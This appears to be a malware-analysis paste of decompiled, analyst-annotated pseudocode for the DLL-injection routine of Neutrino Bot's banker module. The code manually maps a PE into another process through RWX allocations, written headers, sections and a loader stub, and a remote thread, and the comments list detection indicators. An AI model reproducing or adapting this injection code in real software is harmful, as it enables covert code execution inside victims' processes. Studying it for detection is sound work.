PepperPotts

InjectDll from the banker module of Neutrino Bot (2018/08/27)

Jan 2nd, 2019
/*
 * InjectDll - Hex-Rays pseudocode (not compilable as-is) of the DLL injector in the
 * Neutrino Bot banker module.  Code kept verbatim; the comments are analyst notes.
 *
 * hProcess  : handle to the target process.
 * lpAddress : in-memory copy of the DLL *file* (raw PE, not a mapped image): the code
 *             reads e_lfanew, the section table and PointerToRawData, i.e. file layout.
 * Returns   : 1 on success, 0 on any failure (char).
 *
 * Flow: check that lpAddress is readable and starts with a PE header -> branch on the
 * Machine field (PE32+ -> x64 target, else x86) -> allocate two RWX regions in the
 * target (one for the image, one for a parameter block followed by an embedded loader
 * stub) -> copy headers and sections -> fill the parameter block with the remote image
 * base, the base-relocation and import directory addresses and four ntdll exports ->
 * write block and stub -> start a remote thread at the stub with the block as argument.
 * The remote stub (unk_10025530 for x64, the "éá" blob for x86; neither shown here)
 * presumably performs relocation and import resolution itself, i.e. manual mapping.
 *
 * Observable behaviour for detection: VirtualAllocEx with PAGE_EXECUTE_READWRITE
 * (0x40), WriteProcessMemory of an "MZ" header into a private region, VirtualProtectEx
 * to PAGE_EXECUTE_READ (0x20), then RtlCreateUserThread / CreateRemoteThread whose start
 * address lies in a private (non-image) region.  On the x64 branch the same steps go
 * through the sub_1000xxxx helpers, which take (low, high) DWORD halves of 64-bit
 * addresses and presumably wrap the 64-bit APIs from this 32-bit module - not shown,
 * confirm against those functions.
 */
char __cdecl InjectDll(HANDLE hProcess, LPCVOID lpAddress)
{
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v5; // kr00_8
  __int64 v6; // rax
  _DWORD *v7; // edx
  __int64 v8; // rax
  __int64 v9; // rax
  __int64 v10; // rax
  __int64 v11; // rax
  __int64 v12; // rax
  HMODULE v13; // eax
  FARPROC v14; // [esp+Ch] [ebp-29Ch]   RtlCreateUnicodeStringFromAsciiz (x86 path)
  FARPROC v15; // [esp+10h] [ebp-298h]  RtlInitAnsiString (x86 path)
  FARPROC v16; // [esp+14h] [ebp-294h]  LdrGetProcedureAddress (x86 path)
  FARPROC v17; // [esp+18h] [ebp-290h]  LdrLoadDll (x86 path)
  __int64 v18; // [esp+1Ch] [ebp-28Ch]  RtlCreateUnicodeStringFromAsciiz (x64 path)
  __int64 v19; // [esp+24h] [ebp-284h]  RtlInitAnsiString (x64 path)
  __int64 v20; // [esp+2Ch] [ebp-27Ch]  LdrGetProcedureAddress (x64 path)
  __int64 v21; // [esp+34h] [ebp-274h]  LdrLoadDll (x64 path)
  LPCVOID v22; // [esp+3Ch] [ebp-26Ch]
  bool v23; // [esp+43h] [ebp-265h]     readable-memory test result (VersionInformation)
  struct _MEMORY_BASIC_INFORMATION v24; // [esp+44h] [ebp-264h]
  SIZE_T v25; // [esp+60h] [ebp-248h]
  bool v26; // [esp+67h] [ebp-241h]     readable-memory test result (lpBuffer)
  struct _MEMORY_BASIC_INFORMATION v27; // [esp+68h] [ebp-240h]
  SIZE_T v28; // [esp+84h] [ebp-224h]
  bool v29; // [esp+8Bh] [ebp-21Dh]     readable-memory test result (v49)
  struct _MEMORY_BASIC_INFORMATION v30; // [esp+8Ch] [ebp-21Ch]
  SIZE_T v31; // [esp+A8h] [ebp-200h]
  unsigned int v32; // [esp+ACh] [ebp-1FCh]  x86 stub size
  char *v33; // [esp+B0h] [ebp-1F8h]         local copy of the x86 stub
  unsigned int v34; // [esp+B4h] [ebp-1F4h]  x64 stub size
  void *v35; // [esp+B8h] [ebp-1F0h]         local copy of the x64 stub
  char v36; // [esp+BFh] [ebp-1E9h]          readable-memory test result (lpAddress)
  struct _MEMORY_BASIC_INFORMATION Buffer; // [esp+C0h] [ebp-1E8h]
  SIZE_T v38; // [esp+DCh] [ebp-1CCh]
  char v39; // [esp+E0h] [ebp-1C8h]          receives the CLIENT_ID-style out argument of RtlCreateUserThread - presumably
  HANDLE v40; // [esp+E8h] [ebp-1C0h]        remote thread handle (x86 path)
  int v41; // [esp+ECh] [ebp-1BCh]           NTSTATUS from RtlCreateUserThread (x86 path)
  FARPROC v42; // [esp+F0h] [ebp-1B8h]       RtlCreateUserThread (x86 path)
  unsigned __int16 j; // [esp+F4h] [ebp-1B4h]
  struct _OSVERSIONINFOW VersionInformation; // [esp+F8h] [ebp-1B0h]
  LPCVOID lpBuffer; // [esp+218h] [ebp-90h]  local x86 parameter block (28 bytes)
  unsigned int i; // [esp+21Ch] [ebp-8Ch]
  __int64 v47; // [esp+220h] [ebp-88h]       RtlCreateUserThread (x64 path)
  __int64 hObject; // [esp+238h] [ebp-70h]   remote thread handle (x64 path) - never assigned in visible code
  LPCVOID v49; // [esp+244h] [ebp-64h]       local x64 parameter block (56 bytes)
  __int64 hModule; // [esp+248h] [ebp-60h]   ntdll.dll base in the target's bitness
  char *v51; // [esp+250h] [ebp-58h]         IMAGE_NT_HEADERS64 of the local file image
  DWORD flOldProtect; // [esp+254h] [ebp-54h]
  int v53; // [esp+258h] [ebp-50h]           unused
  int v54; // [esp+25Ch] [ebp-4Ch]           unused
  char v55; // [esp+267h] [ebp-41h]          1 = PE32+ (x64) image
  __int64 v56; // [esp+268h] [ebp-40h]       size of the embedded loader stub
  unsigned __int16 *v57; // [esp+270h] [ebp-38h]  -> IMAGE_FILE_HEADER.Machine
  bool v58; // [esp+277h] [ebp-31h]          VirtualProtectEx result; stored but never read
  _DWORD *v59; // [esp+278h] [ebp-30h]       lpAddress viewed as DWORDs (DOS header)
  char v60; // [esp+27Fh] [ebp-29h]          return value used by the early exits (always 0)
  __int64 nSize; // [esp+280h] [ebp-28h]     size of the parameter block
  LPCVOID v62; // [esp+28Ch] [ebp-1Ch]       local copy of the loader stub (either bitness)
  char *v63; // [esp+290h] [ebp-18h]         first IMAGE_SECTION_HEADER
  char *v64; // [esp+294h] [ebp-14h]         IMAGE_NT_HEADERS32 of the local file image
  __int64 lpBaseAddress; // [esp+298h] [ebp-10h]  remote image base
  __int64 lpParameter; // [esp+2A0h] [ebp-8h]     remote parameter block; stub is written right after it
 
  v60 = 0;
  v55 = 0;
  v58 = 0;
  flOldProtect = 0;
  hModule = 0i64;
  v53 = 0;
  v54 = 0;
  lpBaseAddress = 0i64;
  lpParameter = 0i64;
  v56 = 0i64;
  nSize = 0i64;
  v62 = 0;
  if ( !hProcess )
    return v60;
  // Inlined "is this readable memory?" test, repeated four times in this function:
  // VirtualQuery succeeds and Protect is neither PAGE_NOACCESS (1) nor PAGE_GUARD (0x100).
  // 0x1C == sizeof(MEMORY_BASIC_INFORMATION) for a 32-bit caller.
  v38 = VirtualQuery(lpAddress, &Buffer, 0x1Cu);
  if ( v38 )
    v36 = Buffer.Protect & 1 ? 0 : (Buffer.Protect & 0x100) == 0;
  else
    v36 = 0;
  if ( !v36 )
    return v60;
  v59 = lpAddress;
  if ( *(_WORD *)lpAddress != 23117 )   // 23117 == 0x5A4D, IMAGE_DOS_SIGNATURE ("MZ")
    return 0;
  // v59[15] is DOS header offset 0x3C (e_lfanew); +4 skips the "PE\0\0" signature, so
  // v57 points at IMAGE_FILE_HEADER.Machine.  34404 == 0x8664 == IMAGE_FILE_MACHINE_AMD64.
  // No bounds check is done on e_lfanew against the buffer size.
  v57 = (unsigned __int16 *)((char *)lpAddress + v59[15] + 4);
  if ( *v57 == 34404 )
    v55 = 1;
  if ( v55 )
  {
    // PE32+ (x64) target.  Memory operations go through the sub_1000xxxx helpers,
    // which take (low, high) halves of 64-bit addresses - presumably 64-bit API wrappers.
    sub_10001000();
    v56 = 1088i64;                     // x64 loader stub: 1088 bytes at unk_10025530
    nSize = 56i64;                     // x64 parameter block: 7 x 8-byte fields (layout below)
    v34 = 1088;
    // 0x441 == 1089 == stub size + 1; 0x3000 == MEM_COMMIT|MEM_RESERVE; 4 == PAGE_READWRITE
    v35 = VirtualAlloc(0, 0x441u, 0x3000u, 4u);
    if ( v35 && v35 && &unk_10025530 && v34 )    // duplicated/constant tests are a decompiler artifact
      qmemcpy(v35, &unk_10025530, v34);
    v62 = v35;
    v51 = (char *)lpAddress + v59[15];          // IMAGE_NT_HEADERS64
    // NT headers + 80 == OptionalHeader.SizeOfImage.
    // 12288 == MEM_COMMIT|MEM_RESERVE, 64 == PAGE_EXECUTE_READWRITE: both remote regions are RWX.
    LODWORD(v3) = sub_10001B70(hProcess, 0, 0, *((_DWORD *)v51 + 20), 12288, 64);
    lpBaseAddress = v3;
    LODWORD(v4) = sub_10001B70(hProcess, 0, 0, nSize + v56, 12288, 64);   // parameter block + stub
    lpParameter = v4;
  }
  else
  {
    // PE32 (x86) target: plain Win32 APIs.
    v56 = 13839i64;                    // x86 loader stub: 13839 bytes; the "éá" literal below is the
                                       // start of that binary blob rendered as text (presumably
                                       // 0xE9 0xE1 ..., i.e. it begins with a JMP rel32 - confirm)
    nSize = 28i64;                     // x86 parameter block: 7 x 4-byte fields (layout below)
    v32 = 13839;
    v33 = (char *)VirtualAlloc(0, 0x3610u, 0x3000u, 4u);   // 0x3610 == 13840 == stub size + 1
    if ( v33 && v33 && "éá" && v32 )
      qmemcpy(v33, "éá", v32);
    v62 = v33;
    v64 = (char *)lpAddress + v59[15];          // IMAGE_NT_HEADERS32
    // +80 == OptionalHeader.SizeOfImage; 0x40 == PAGE_EXECUTE_READWRITE.
    // The 64-bit results are built from a sign-extended 32-bit value.
    lpBaseAddress = (signed int)VirtualAllocEx(hProcess, 0, *((_DWORD *)v64 + 20), 0x3000u, 0x40u);
    lpParameter = (signed int)VirtualAllocEx(hProcess, 0, nSize + v56, 0x3000u, 0x40u);
  }
  if ( !lpBaseAddress || !lpParameter )
    return 0;
  v63 = 0;
  if ( v55 )
  {
    v63 = v51 + 264;                            // 264 == sizeof(IMAGE_NT_HEADERS64): first IMAGE_SECTION_HEADER
    // Copy the PE headers (NT headers + 84 == OptionalHeader.SizeOfHeaders) to the remote image base.
    if ( !sub_10001D20(hProcess, lpBaseAddress, HIDWORD(lpBaseAddress), lpAddress, *((_DWORD *)v51 + 21), 0) )
      return 0;
    // Copy every section with a non-zero SizeOfRawData from its file offset to its RVA.
    // IMAGE_SECTION_HEADER is 40 bytes: +12 VirtualAddress, +16 SizeOfRawData, +20 PointerToRawData.
    // NT headers + 6 == IMAGE_FILE_HEADER.NumberOfSections.  Section RVAs/sizes are not
    // validated against SizeOfImage or the local buffer size.
    for ( i = 0; i < *((unsigned __int16 *)v51 + 3); ++i )
    {
      if ( *(_DWORD *)&v63[40 * i + 16] )
      {
        v5 = lpBaseAddress + *(unsigned int *)&v63[40 * i + 12];
        if ( !sub_10001D20(
                hProcess,
                v5,
                HIDWORD(v5),
                (char *)lpAddress + *(_DWORD *)&v63[40 * i + 20],
                *(_DWORD *)&v63[40 * i + 16],
                0) )
          return 0;
      }
    }
    v49 = (LPCVOID)sub_10013750(56);            // local 56-byte parameter block (allocator not shown)
    v31 = VirtualQuery(v49, &v30, 0x1Cu);       // same readable-memory test as above
    if ( v31 )
    {
      if ( v30.Protect & 1 )
        v29 = 0;
      else
        v29 = (v30.Protect & 0x100) == 0;
    }
    else
    {
      v29 = 0;
    }
    if ( !v29 )
      return 0;
    LODWORD(v6) = sub_10001390(L"ntdll.dll");   // presumably the 64-bit ntdll.dll base (not shown)
    hModule = v6;
    if ( !v6 )
      return 0;
    // x64 parameter block, 8-byte fields:
    //   +0   remote image base
    //   +8   image base + *(NT headers + 176): IMAGE_DATA_DIRECTORY[5] (base relocations) RVA
    //   +16  image base + *(NT headers + 144): IMAGE_DATA_DIRECTORY[1] (imports) RVA
    //   +24  LdrLoadDll   +32  LdrGetProcedureAddress
    //   +40  RtlInitAnsiString   +48  RtlCreateUnicodeStringFromAsciiz
    // i.e. exactly what a remote stub needs to apply relocations and resolve imports itself.
    v7 = v49;
    *(_DWORD *)v49 = lpBaseAddress;
    v7[1] = HIDWORD(lpBaseAddress);
    *((_QWORD *)v49 + 1) = lpBaseAddress + *((unsigned int *)v51 + 44);
    *((_QWORD *)v49 + 2) = lpBaseAddress + *((unsigned int *)v51 + 36);
    // Each export is resolved with the 64-bit GetProcAddress counterpart (sub_10001AB0) and
    // stored as two DWORDs; the LODWORD(vN) = v49 dance is how the decompiler shows that.
    LODWORD(v8) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrLoadDll");
    v21 = v8;
    LODWORD(v8) = v49;
    *((_DWORD *)v49 + 6) = v21;
    *(_DWORD *)(v8 + 28) = HIDWORD(v21);
    if ( !v21 )
      return 0;
    LODWORD(v9) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrGetProcedureAddress");
    v20 = v9;
    LODWORD(v9) = v49;
    *((_DWORD *)v49 + 8) = v20;
    *(_DWORD *)(v9 + 36) = HIDWORD(v20);
    if ( !v20 )
      return 0;
    LODWORD(v10) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlInitAnsiString");
    v19 = v10;
    LODWORD(v10) = v49;
    *((_DWORD *)v49 + 10) = v19;
    *(_DWORD *)(v10 + 44) = HIDWORD(v19);
    if ( !v19 )
      return 0;
    LODWORD(v11) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUnicodeStringFromAsciiz");
    v18 = v11;
    LODWORD(v11) = v49;
    *((_DWORD *)v49 + 12) = v18;
    *(_DWORD *)(v11 + 52) = HIDWORD(v18);
    if ( !v18 )
      return 0;
    // Write the parameter block, then the stub immediately after it.
    if ( !sub_10001D20(hProcess, lpParameter, HIDWORD(lpParameter), v49, nSize, 0) )
      return 0;
    if ( !sub_10001D20(hProcess, nSize + lpParameter, (unsigned __int64)(nSize + lpParameter) >> 32, v62, v56, 0) )
      return 0;
    // Re-protect the first 28 bytes to 32 == PAGE_EXECUTE_READ; the result is never checked,
    // so a failure here still leaves the region RWX.
    v58 = sub_10001C50(hProcess, lpParameter, HIDWORD(lpParameter), 28, 32, &flOldProtect) != 0;
    LODWORD(v12) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUserThread");
    v47 = v12;
    if ( !v12 )
      return 0;
    // Invokes the 64-bit RtlCreateUserThread through sub_10001040 with 10 arguments (the
    // arguments themselves were not recovered by the decompiler).  hObject is never assigned
    // in the visible code, so it is presumably filled via an out-pointer in that hidden
    // argument list - confirm before relying on it.  The thread handle is closed immediately.
    if ( (signed int)sub_10001040(v47, SHIDWORD(v47), 10) >= 0 && hObject )
      CloseHandle((HANDLE)hObject);
  }
  else
  {
    v63 = v64 + 248;                            // 248 == sizeof(IMAGE_NT_HEADERS32): first IMAGE_SECTION_HEADER
    // Copy the PE headers (NT headers + 84 == SizeOfHeaders) to the remote image base.
    if ( !WriteProcessMemory(hProcess, (LPVOID)lpBaseAddress, lpAddress, *((_DWORD *)v64 + 21), 0) )
      return 0;
    // Same section copy loop as the x64 path; see the offset notes there.
    for ( j = 0; j < (signed int)*((unsigned __int16 *)v64 + 3); ++j )
    {
      if ( *(_DWORD *)&v63[40 * j + 16]
        && !WriteProcessMemory(
              hProcess,
              (LPVOID)(*(_DWORD *)&v63[40 * j + 12] + lpBaseAddress),
              (char *)lpAddress + *(_DWORD *)&v63[40 * j + 20],
              *(_DWORD *)&v63[40 * j + 16],
              0) )
      {
        return 0;
      }
    }
    lpBuffer = (LPCVOID)sub_10013750(28);       // local 28-byte parameter block
    v28 = VirtualQuery(lpBuffer, &v27, 0x1Cu);  // readable-memory test
    if ( v28 )
    {
      if ( v27.Protect & 1 )
        v26 = 0;
      else
        v26 = (v27.Protect & 0x100) == 0;
    }
    else
    {
      v26 = 0;
    }
    if ( !v26 )
      return 0;
    v13 = GetModuleHandleW(L"ntdll.dll");       // injector's own (32-bit) ntdll, shared with a 32-bit target
    hModule = (signed int)v13;
    if ( !v13 )
      return 0;
    // x86 parameter block, 4-byte fields:
    //   +0  remote image base
    //   +4  image base + *(NT headers + 160): IMAGE_DATA_DIRECTORY[5] (base relocations) RVA
    //   +8  image base + *(NT headers + 128): IMAGE_DATA_DIRECTORY[1] (imports) RVA
    //   +12 LdrLoadDll  +16 LdrGetProcedureAddress  +20 RtlInitAnsiString  +24 RtlCreateUnicodeStringFromAsciiz
    *(_DWORD *)lpBuffer = lpBaseAddress;
    *((_DWORD *)lpBuffer + 1) = lpBaseAddress + *((_DWORD *)v64 + 40);
    *((_DWORD *)lpBuffer + 2) = lpBaseAddress + *((_DWORD *)v64 + 32);
    v17 = GetProcAddress((HMODULE)hModule, "LdrLoadDll");
    *((_DWORD *)lpBuffer + 3) = v17;
    if ( !v17 )
      return 0;
    v16 = GetProcAddress((HMODULE)hModule, "LdrGetProcedureAddress");
    *((_DWORD *)lpBuffer + 4) = v16;
    if ( !v16 )
      return 0;
    v15 = GetProcAddress((HMODULE)hModule, "RtlInitAnsiString");
    *((_DWORD *)lpBuffer + 5) = v15;
    if ( !v15 )
      return 0;
    v14 = GetProcAddress((HMODULE)hModule, "RtlCreateUnicodeStringFromAsciiz");
    *((_DWORD *)lpBuffer + 6) = v14;
    if ( !v14 )
      return 0;
    // Write the parameter block, then the stub immediately after it.
    if ( !WriteProcessMemory(hProcess, (LPVOID)lpParameter, lpBuffer, nSize, 0) )
      return 0;
    if ( !WriteProcessMemory(hProcess, (LPVOID)(nSize + lpParameter), v62, v56, 0) )
      return 0;
    // 0x1C == 28 bytes (the block) to 0x20 == PAGE_EXECUTE_READ; result stored but never read.
    v58 = VirtualProtectEx(hProcess, (LPVOID)lpParameter, 0x1Cu, 0x20u, &flOldProtect) != 0;
    v22 = &VersionInformation;
    // The readable-memory test applied to a local stack struct before memset; effectively
    // always true.  Note the memset covers 0x9C bytes while dwOSVersionInfoSize is set to 284.
    v25 = VirtualQuery(&VersionInformation, &v24, 0x1Cu);
    if ( v25 )
    {
      if ( v24.Protect & 1 )
        v23 = 0;
      else
        v23 = (v24.Protect & 0x100) == 0;
    }
    else
    {
      v23 = 0;
    }
    if ( v23 )
      memset((void *)v22, 0, 0x9Cu);
    VersionInformation.dwOSVersionInfoSize = 284;   // 284 == sizeof(OSVERSIONINFOEXW)
    GetVersionExW(&VersionInformation);
    if ( VersionInformation.dwMajorVersion > 5 )    // Vista and later: undocumented RtlCreateUserThread
    {
      // Unlike the four exports above, v42 is not NULL-checked before the call.
      // Start address = stub (lpParameter + nSize), thread argument = the parameter block.
      v42 = GetProcAddress((HMODULE)hModule, "RtlCreateUserThread");
      v41 = ((int (__cdecl *)(HANDLE, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, HANDLE *, char *))v42)(
              hProcess,
              0,
              0,
              0,
              0,
              0,
              nSize + lpParameter,
              lpParameter,
              &v40,
              &v39);
      if ( v41 < 0 )                              // NTSTATUS failure
        return 0;
      if ( v40 )
        CloseHandle(v40);
    }
    else if ( !CreateRemoteThread(                // XP/2003: documented API, same start/argument
                 hProcess,
                 0,
                 0,
                 (LPTHREAD_START_ROUTINE)(nSize + lpParameter),
                 (LPVOID)lpParameter,
                 0,
                 0) )
    {
      return 0;
    }
  }
  // The local stub copies (v35/v33) and parameter blocks (v49/lpBuffer) are not freed on
  // any path in the visible code.
  return 1;
}